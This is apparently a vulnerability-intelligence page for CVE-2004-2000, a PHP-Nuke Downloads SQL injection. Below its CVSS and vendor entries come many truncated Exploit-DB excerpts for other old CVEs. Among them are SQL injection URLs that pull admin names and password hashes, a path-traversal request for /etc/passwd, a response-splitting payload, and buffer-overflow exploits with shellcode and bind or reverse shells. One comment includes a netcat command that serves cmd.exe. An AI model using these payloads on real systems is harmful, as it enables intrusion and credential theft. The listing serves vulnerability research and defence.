CVE-2004-2000
Published: 2004-05-05
Priority: P339 · Severity: high · CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available
EPSS: 1.87% (76.7th percentile)
SQL injection vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to execute arbitrary SQL via the (1) orderby or (2) sid parameters to modules.php.
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 9.3 CRITICAL
GHSA
GHSA-6979-7cwq-22m2: SQL injection vulnerability in the Downloads module in Php-Nuke 6
ghsa_unreviewed·2022-04-29
CVE-2004-2000 [HIGH] GHSA-6979-7cwq-22m2: SQL injection vulnerability in the Downloads module in Php-Nuke 6
SQL injection vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to execute arbitrary SQL via the (1) orderby or (2) sid parameters to modules.php.
Red Hat
security flaw
vendor_redhat·2000-09-01·CVSS 5.0
CVE-2004-0175 [MEDIUM] security flaw
security flaw
Directory traversal vulnerability in scp for OpenSSH before 3.4p1 allows remote malicious servers to overwrite arbitrary files. NOTE: this may be a rediscovery of CVE-2000-0992.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Red Hat
CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
vendor_redhat·CVSS 9.3
CVE-2006-1017 [CRITICAL] CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
The c-client library 2000, 2001, or 2004 for PHP before 4.4.4 and 5.x before 5.1.5 do not check the (1) safe_mode or (2) open_basedir functions, and when used in applications that accept user-controlled input for the mailbox argument to the imap_open function, allow remote attackers to obtain access to an IMAP stream data structure and conduct unauthorized IMAP actions.
Statement: We do not consider safe_mode / open_basedir restriction bypass issues to be security sensitive. For more details see http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and http://www.php.net/security-note.php
No detection rules found.
Exploit-DB
RhinoSoft Serv-U FTPd Server < 4.2 - Remote Buffer Overflow (Metasploit)
exploitdb·2011-12-02
CVE-2004-2111 RhinoSoft Serv-U FTPd Server < 4.2 - Remote Buffer Overflow (Metasploit)
RhinoSoft Serv-U FTPd Server 'Serv-U FTP Server %q{
This module exploits a stack buffer overflow in the site chmod command
in versions of Serv-U FTP Server prior to 4.2.
You must have valid credentials to trigger this vulnerability. Exploitation
also leaves the service in a non-functional state.
},
'Author' => 'thelightcosine ',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-2111'],
[ 'BID', '9483'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP0-4 EN', {
'Ret' => 0x750212bc, #WS2HELP.DLL
'Offset' => 396 } ],
[ 'Windows XP SP0-1 EN', {
'Ret' => 0x71aa388f,
Exploit-DB
Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
exploitdb·2010-09-20
CVE-2004-1080 Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
---
##
# $Id: ms04_045_wins.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft WINS Service Memory Overwrite',
'Description' => %q{
This module exploits an arbitrary memory write flaw in the
WINS service. This exploit has been tested against Windows
2000 only.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2004-1080'],
[ 'OSVDB', '12378'],
[ 'BID', '11763'],
[ '
Exploit-DB
Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
exploitdb·2010-07-03
CVE-2004-0206 Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
---
##
# $Id: ms04_031_netdde.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft NetDDE Service Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetDDE service, which is the
precursor to the DCOM interface. This exploit effects only operating systems
released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim
that this vulnerability can be exploited without authentication, the N
Exploit-DB
IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2004-0297 IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
---
##
# $Id: imail_thc.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'IMail LDAP Service Buffer Overflow',
'Description' => %q{
This exploits a buffer overflow in the LDAP service that is
part of the IMail product. This module was tested against
version 7.10 and 8.5, both running on Windows 2000.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-0297'],
[ 'OSVDB'
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
exploitdb·2009-01-27
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
---
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE) Buffer Overflow PoC
my $chars="\x90" x 2000;
open(MYFILE,'>>hakxer.pls');
print MYFILE $chars;
close(MYFILE);
print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";
# milw0rm.com [2009-01-27]
Exploit-DB
ClanLite 2.x - SQL Injection / Cross-Site Scripting
exploitdb·2008-05-12
CVE-2008-5215 ClanLite 2.x - SQL Injection / Cross-Site Scripting
ClanLite 2.x - SQL Injection / Cross-Site Scripting
---
########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################
ClanLite V2 SQL inj. & XSS
dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005
dork: Themed By Ray © 2003, 2004 iOptional
readme script
/****************************************************************************
* File : *
* Copyright : (C) 2004 ClanLite V2 *
* Email : [email protected] *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
******************************************************************
Exploit-DB
Microsoft Office 2000/2003/2004/XP - File Memory Corruption
exploitdb·2008-03-07
CVE-2008-0118 Microsoft Office 2000/2003/2004/XP - File Memory Corruption
Microsoft Office 2000/2003/2004/XP - File Memory Corruption
---
source: https://www.securityfocus.com/bid/28146/info
Microsoft Office is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open a malicious Office file.
Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31361.tgz
Exploit-DB
PHP-Nuke Downloads Module - 'sid' SQL Injection
exploitdb·2008-02-21
CVE-2004-2000 PHP-Nuke Downloads Module - 'sid' SQL Injection
PHP-Nuke Downloads Module - 'sid' SQL Injection
---
source: https://www.securityfocus.com/bid/27932/info
The Downloads module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,aid/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202
http://www.example.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,pwd/**/from%2F%2A%2A%2Fnuke_authors/*where%20adm
Exploit-DB
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
exploitdb·2006-07-06
CVE-2006-3431 Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
---
source: https://www.securityfocus.com/bid/18872/info
Microsoft Excel is prone to a remote code-execution vulnerability.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of targeted users.
A proof-of-concept malicious code named 'Trojan.Hongmosa' is actively exploiting this vulnerability, which results in crashing Excel running on Simplified Chinese, Traditional Chinese, Japanese, or Korean Windows.
Note that Microsoft Office applications include functionality to embed Office files as objects contained in other Office files. As an example, Microsoft Word files may contain embedded malicious Microsoft Excel files, making Word documents another possible attack vect
Exploit-DB
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
exploitdb·2005-12-08
CVE-2005-4131 Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
---
source: https://www.securityfocus.com/bid/15780/info
Microsoft Excel is susceptible to a remote code-execution vulnerability. This issue was originally disclosed through an eBay auction that has since been terminated.
This issue is due to the application's failure to properly bounds-check user-supplied input data in the 'Named Range' definition in Excel data files. This results in the corruption of critical memory sections, allowing code execution.
The following is a proof-of-concept example segment of an Excel data file. The '*' characters represent the location of the affected value that triggers this issue. Setting these locations to '0xFF' will crash the application.
00000720 00 80 00 ff 93 02 04 00
Exploit-DB
Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)
exploitdb·2005-06-29
CVE-2005-0059 Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)
Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)
---
/* HOD-ms05017-msmq-expl.c: 2005-06-28: PUBLIC v.0.3
*
* Copyright (c) 2004-2005 houseofdabus.
*
* (MS05-017) Message Queuing Buffer Overflow Vulnerability
* Universal Exploit
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* [ http://www.livejournal.com/users/houseofdabus
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows XP SP1
* - Windows 2000 SP4
* - Windows 2000 SP3
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in Message Queuing
* that could allow an attacker who successfully exploited this
* vulnerability to take complete control of the affected system.
*
* ---
Exploit-DB
Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow
exploitdb·2005-04-13
CVE-2004-1774 Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow
Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow
---
source: https://www.securityfocus.com/bid/13145/info
Oracle Database is reported prone to a buffer overflow vulnerability.
Reportedly this issue affects the 'MDSYS.MD2.SDO_CODE_SIZE' procedure. An attacker can supply excessive data to an affected routine resulting in overflowing a destination buffer. This issue can be leveraged to execute arbitrary code and gain 'SYSDBA' privileges.
It is conjectured that authentication is required to carry out an attack.
This BID will be updated when more information is available.
/*
Advanced SQL Injection in Oracle databases
Exploit for the buffer overflow vulnerability in procedure MDSYS.MD2.SDO_CODE_SIZE
of Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4.
F
Exploit-DB
Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)
exploitdb·2005-04-12
CVE-2004-1080 Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)
Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)
---
/*
Windows Internet Name Service (WINS)
Remote Heap Buffer Overflow
Advisory credits:
Nicolas Waisman of Immunity Inc. (www.immunitysec.com)
Advisory link:
immunitysec.com/downloads/instantanea.pdf
Fix:
support.microsoft.com/kb/870763 (MS04-045)
Exploit method:
PEB (RtlEnterCriticalSection)
Tested Working:
Win2k SP4 Server ENGLISH (should be all languages, not sure)
Win2k SP4 Advanced Server ENGLISH (should be all languages, not sure)
(KB870763 removed!)
Note:
A HAT-SQUAD view on this hole; exploitable and remaining critical for Windows 2000.
May need update for Windows 2003 due to the different
structure of wins.exe in it but the bug remains exploitable
with no KB870763 of course....
If you look closely at my co
Exploit-DB
Microsoft Windows Server 2000 - WINS Remote Code Execution
exploitdb·2004-12-31
CVE-2004-0567 Microsoft Windows Server 2000 - WINS Remote Code Execution
Microsoft Windows Server 2000 - WINS Remote Code Execution
---
/*************************************************************/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by: zuc */
/* works on Windows 2000 SP3/SP4 probably every language */
/*************************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
char shellcode[] =
Exploit-DB
Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow
exploitdb·2004-12-23
CVE-2004-1306 Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow
Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow
---
source: https://www.securityfocus.com/bid/12091/info
Microsoft Windows is prone to an integer overflow vulnerability. This issue exists in 'winhlp32.exe' and is exposed when a malformed phrase compressed Windows Help file (.hlp) is processed by the program.
Successful exploitation may allow execution of arbitrary code in the context of the user that opens the malicious Help file. The Help file may originate from an external or untrusted source, so this vulnerability is considered remote in nature.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25049.gz
Exploit-DB
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
exploitdb·2004-11-29
CVE-2004-1135 Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
---
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 21
#define RPORT 4444
#define RET "\x53\x9B\x2E\x7C" /*win2k sp4*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"
Exploit-DB
Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal
exploitdb·2004-11-25
CVE-2000-0187 Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal
Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal
---
Example:
http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
# milw0rm.com [2004-11-25]
Exploit-DB
DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
exploitdb·2004-11-21
CVE-2004-1533 DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
---
#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl
# DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
#####################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";
sleep(1);
print $socket "USER " . "A" x 1023;
close $socket;
sleep(1);
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (2)
exploitdb·2004-11-16
CVE-2004-2271 MiniShare 1.4.1 - Remote Buffer Overflow (2)
MiniShare 1.4.1 - Remote Buffer Overflow (2)
---
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2
***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\Program Files\MiniShare>
Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\
Exploit-DB
TABS MailCarrier 2.51 - Remote Buffer Overflow
exploitdb·2004-11-16
CVE-2004-1638 TABS MailCarrier 2.51 - Remote Buffer Overflow
TABS MailCarrier 2.51 - Remote Buffer Overflow
---
/* Remote exploit for MailCarrier by NoPh0BiA,
no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x8
Exploit-DB
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
exploitdb·2004-11-07
CVE-2004-1626 Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
---
/*
no@0x00:~/Exploits/abilityftp$ ./ability-exploit
**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**
[x] Launching listener.
[x] Bind successfull.
[x] Listening on port 31337.
[x] Connected to: 192.168.0.1.
[x] Sending bad code...done.
[x] Waiting for shell.
[x] Got connection from 192.168.0.1.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\abilitywebserver>
reverse shellcode that connects back to 192.168.0.2 lamers get your own shellcode ;)
bad chars 0x00 0x0a 0x0d.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RET "\xC7\xF2\xC8\x77" /*win
Exploit-DB
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
exploitdb·2004-10-26
CVE-2004-1638 TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
---
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 23 Oct 2004 - muts #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py #
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\WINNT\system32> #
#########################################################
import struct
import socket
print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO
Exploit-DB
best software SalesLogix 2000.0 - Multiple Vulnerabilities
exploitdb·2004-10-18
CVE-2004-1612 best software SalesLogix 2000.0 - Multiple Vulnerabilities
best software SalesLogix 2000.0 - Multiple Vulnerabilities
---
source: https://www.securityfocus.com/bid/11450/info
Best Software SalesLogix is affected by multiple vulnerabilities. These issues are due to design errors that reveal sensitive information, access control validation issues that allow unauthorized access and input validation issues facilitating SQL injection attacks.
An attacker may leverage these issues to manipulate and disclose database contents through SQL injection attacks, steal authentication credentials due to information disclosure vulnerabilities and bypass authentication to gain administrator access to the server.
#!/usr/bin/perl
#
# Proof of concept exploit: Arbitrary file creation for SLX server 6.1
#
# Written by Carl Livitt, Agenda Security Services, June 2
Exploit-DB
Snitz Forums 2000 - 'down.asp' HTTP Response Splitting
exploitdb·2004-09-16
CVE-2004-1687 Snitz Forums 2000 - 'down.asp' HTTP Response Splitting
Snitz Forums 2000 - 'down.asp' HTTP Response Splitting
---
source: https://www.securityfocus.com/bid/11201/info
Snitz Forums is reported prone to a HTTP response splitting vulnerability. The issue exists in a parameter of the 'down.asp' script. The issue presents itself due to a flaw in the affected script that allows an attacker to manipulate how GET requests are handled.
A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted.
POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134
location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}
(replace curly braces with less than and greater than symbols)
Exploit-DB
Trillian 0.74i MSN Module - Remote Buffer Overflow
exploitdb·2004-09-08
CVE-2004-1666 Trillian 0.74i MSN Module - Remote Buffer Overflow
Trillian 0.74i MSN Module - Remote Buffer Overflow
---
/*
Cerulean Studios Trillian 0.74i Buffer Overflow in MSN module exploit
created by Komrade - unsecure altervista org
Written for Windows 2000 / Windows XP.
Tested on Windows XP Professional sp0.
This exploit spawn a shell on port 5555, you have just to execute the
program and connect to port 5555.
*/
#include
#include
#include
#include
int main(int argc,char **argv){
char shellcode[] =
Exploit-DB
WFTPD Pro Server 3.21 - MLST Remote Denial of Service
exploitdb·2004-08-31
CVE-2004-1642 WFTPD Pro Server 3.21 - MLST Remote Denial of Service
WFTPD Pro Server 3.21 - MLST Remote Denial of Service
---
/*
*
* wftpd.c - WFTPD Pro Server 3.21 MLST DoS Exploit
*
* Copyright (C) 2000-2004 HUC All Rights Reserved.
*
* Author : lion
* : lion cnhonker net
* : www cnhonker com
* Date : 2004-08-30
*
*/
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
#define FTPPORT 21
#define BUFFSIZE 204800
#define OVERFLOWSIZE 220
#define SIZE 2048
// function
int create_socket();
int client_connect(int sockfd,char* server,int port);
int writebuf(char *s,int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
void checkstatus(char *s);
void loginftp(SOCKET sockfd, char *user, char *pass);
int show = 1;
char recvbuf[BUFFSIZE];
char sendbuf[BUFFSIZE];
void main(int argc, char *argv[])
{
WSADATA wsa;
uns
Exploit-DB
Titan FTP Server - Long Command Heap Overflow
exploitdb·2004-08-31
CVE-2004-1641 Titan FTP Server - Long Command Heap Overflow
Titan FTP Server - Long Command Heap Overflow
---
/*
*
* titanftp.c - TiTan FTP Server Long Command Heap Overflow PoC Exploit
*
* Copyright (C) 2000-2004 HUC All Rights Reserved.
*
* Author : lion
* : lion cnhonker net
* : www cnhonker com
* Date : 2004-08-30
*
*/
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
#define FTPPORT 21
#define BUFFSIZE 204800
#define OVERFLOWSIZE 20480
#define SIZE 2048
// function
int create_socket();
int client_connect(int sockfd,char* server,int port);
int writebuf(char *s,int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
void checkstatus(char *s);
void loginftp(SOCKET sockfd, char *user, char *pass);
int show = 1;
char recvbuf[BUFFSIZE];
char sendbuf[BUFFSIZE];
void main(int argc, char *argv[])
{
WSA
Exploit-DB
Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
exploitdb·2004-08-11
CVE-2004-1714 Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
---
source: https://www.securityfocus.com/bid/10915/info
It is reported that BlackICE PC Protection is prone to a local buffer overrun when handling excessive input in certain configuration directives parsed from the firewall.ini file included with the software.
It is reported that when the system is restarted, and the affected software reads the malicious firewall.ini file both the blackice.exe and blackd.exe executables will crash.
REJECT, 138, default, 1999-07-22 20:26:53, AAAAAAAAAAAAAAAAA.... , 2000,
unknown
(Aprox 1000 A's)
Exploit-DB
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
exploitdb·2004-07-20
CVE-2004-0213 Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
---
/******************************************************************************************
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
** [Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt] **
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** v2.666: added autonomous (allinone) remote exploitation system ;) **
** It can be executed through poor cmd.exe shells (like nc -lp 666 -e cmd.exe from a **
** normal user account). Must be called with an argument (any argument) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4***
Exploit-DB
Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)
exploitdb·2004-07-18
CVE-2004-0212 Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)
Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)
---
//*************************************************************
// Microsoft Windows 2K/XP Task Scheduler Vulnerability (MS04-022)
// Proof-of-Concept Exploit for English WinXP SP1
// 15 Jul 2004
//
// Running this will create a file "j.job". When explorer.exe or any
// file-open dialog box accesses the directory containing this file,
// notepad.exe will be spawn.
//
// Greetz: snooq, sk and all guys at SIG^2 www security org sg
//
//*************************************************************
#include
#include
unsigned char jobfile[] =
"\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"
"\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\
Exploit-DB
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
exploitdb·2004-07-17
CVE-2004-0213 Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
---
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
*
* Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
*
* Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
*
* 2004/07/16
*
* thanks to eyas xfocus org
*
*
C:\>whoami
VITUALWIN2K\test
C:\>posixexp
Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com
pax: illegal option--h
Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.
pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte
pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr]
[-t device] [-x format] [pathname...]
pax -r -w [-ilmopuvy] [
Exploit-DB
Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
exploitdb·2004-07-17
CVE-2004-0213 Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
---
/******************************************************************************************
****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4*****
** [Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt] **
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
******************************************************************************************/
/* original disclaimer */
//by Cesar Cerrudo sqlsec>at
#include
struct {
int id;
char *utilman;
char *winhelp;
char *open;
} lang[]
Exploit-DB
Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)
exploitdb·2004-07-16
CVE-2004-0210 Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)
